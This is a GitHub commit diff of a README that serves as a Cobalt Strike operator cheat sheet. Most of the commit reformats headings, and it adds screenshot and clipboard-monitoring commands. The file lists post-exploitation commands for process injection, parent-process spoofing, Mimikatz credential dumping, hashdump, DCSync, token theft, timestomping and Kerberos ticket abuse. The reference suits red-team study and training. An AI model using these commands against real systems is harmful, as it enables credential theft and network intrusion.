Skip to content

Commit 17ee4c6

Browse files
committed
Update README.md
1 parent 896ed48 commit 17ee4c6

File tree

1 file changed

+26
-13
lines changed

1 file changed

+26
-13
lines changed

01-CobaltStrike/README.md

Lines changed: 26 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -4,13 +4,13 @@
44

55
## Command References
66

7-
#### Beacons
7+
### Beacons
88
##### Sleep
99
```css
1010
sleep 60 50 ; Sleep 60 sec with 50% of jitter (Call back between 30 to 60 secs randomly)
1111
```
1212

13-
#### Command Execution
13+
### Command Execution
1414
##### Default
1515
```css
1616
run [command]
@@ -40,63 +40,63 @@ execute-assembly [/path/to/your.exe] ; Running it from your localhost
4040
shell [command] [args]
4141
```
4242

43-
#### Session Passing
43+
### Session Passing
4444
```css
4545
spawn [x86|x64] [Listener]
4646
inject [PID] [x86|x64] [Listener]
4747
```
4848

49-
#### Parent Process Modification
49+
### Parent Process Modification
5050
```css
5151
ppid [Choice of your parent process (e.g., iexplore.exe)]
5252
spawnto [x86|x64] [New parent process]
5353
```
5454

55-
#### SMB Beacn
55+
### SMB Beacn
5656
```css
5757
spawn [SMB-Listner-Name] ; Spawning a peer-to-peer ("P2P") SMB beacon
5858
inject [PID] [x86|x64] [SMB-Listner-Name] ; Useful when trying to spawn P2P beacon as different user context
5959
```
6060

61-
#### TCP Beacn
61+
### TCP Beacn
6262
```css
6363
spawn [TCP-Listner-Name] ; Spawning a peer-to-peer ("P2P") TCP beacon
6464
; TCP beacons can be also run locally by clicking "Bind to localhost only" on GUI
6565
inject [PID] [x86|x64] [TCP-Listner-Name] ; Useful when trying to spawn P2P beacon as different user context
6666
```
6767

68-
#### Credentials and Hashes
68+
### Credentials and Hashes
6969
```css
7070
logonpasswords ; Run Mimikatz
7171
hashdump ; Get SAM database hashes
7272
```
7373

74-
#### Mimikatz
74+
### Mimikatz
7575
```css
7676
mimikatz [command] [args] ; Runs a Mimikatz command
7777
mimikatz ![command] [args] ; Elevate to SYSTEM and run Mimikatz command
7878
mimikatz @[command] [args] ; User current token to run Mimikatz command
7979
```
80-
#### DCSync
80+
### DCSync
8181
```css
8282
dcsync [domain] [DOMAIN\user]
8383
```
8484

85-
#### File Download
85+
### File Download
8686
```css
8787
download [file]
8888
cancel [file|*]
8989
downloads
9090
View --> Downloads --> Sync Files
9191
```
9292

93-
#### File Upload
93+
### File Upload
9494
```css
9595
upload [/path/to/file]
9696
timestomp [Destination] [Source] ; Changing file's timestamps (*Do not recommend using it during the engagement)
9797
```
9898

99-
#### Token Stealing
99+
### Token Stealing
100100
```css
101101
ps ; List process
102102
steal_token [PID] ; Stealing token
@@ -109,7 +109,7 @@ make_token DOMaIN\user password ; Create a token. So when you do a m
109109
; (maybe against DC) you will see that the maked token user.
110110
```
111111

112-
#### Kerberos Tickets
112+
### Kerberos Tickets
113113
```css
114114
klist ; See your current Kerberos tray
115115
kerberos_ticket_purge ; Purge tickets
@@ -120,3 +120,16 @@ kerberos_ticket_user [/path/to/file.ticket] ; Load a ticket
120120
- Domain SID [whoami /user + drop last number]
121121
- NTLM hash of krbtgt user from DC
122122
```
123+
124+
### Screenshots
125+
```css
126+
screenshot [pid] <x84|x64>
127+
screenwatch [pid] <x84/x64>
128+
printscreen
129+
```
130+
131+
### Keylogging / ClipboardTheft
132+
* [Start-ClipboardMonitor.ps1](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1)
133+
```css
134+
psinject <Process ID> x64 Start-ClipboardMonitor -CollectionLimit 5
135+
```

0 commit comments

Comments
 (0)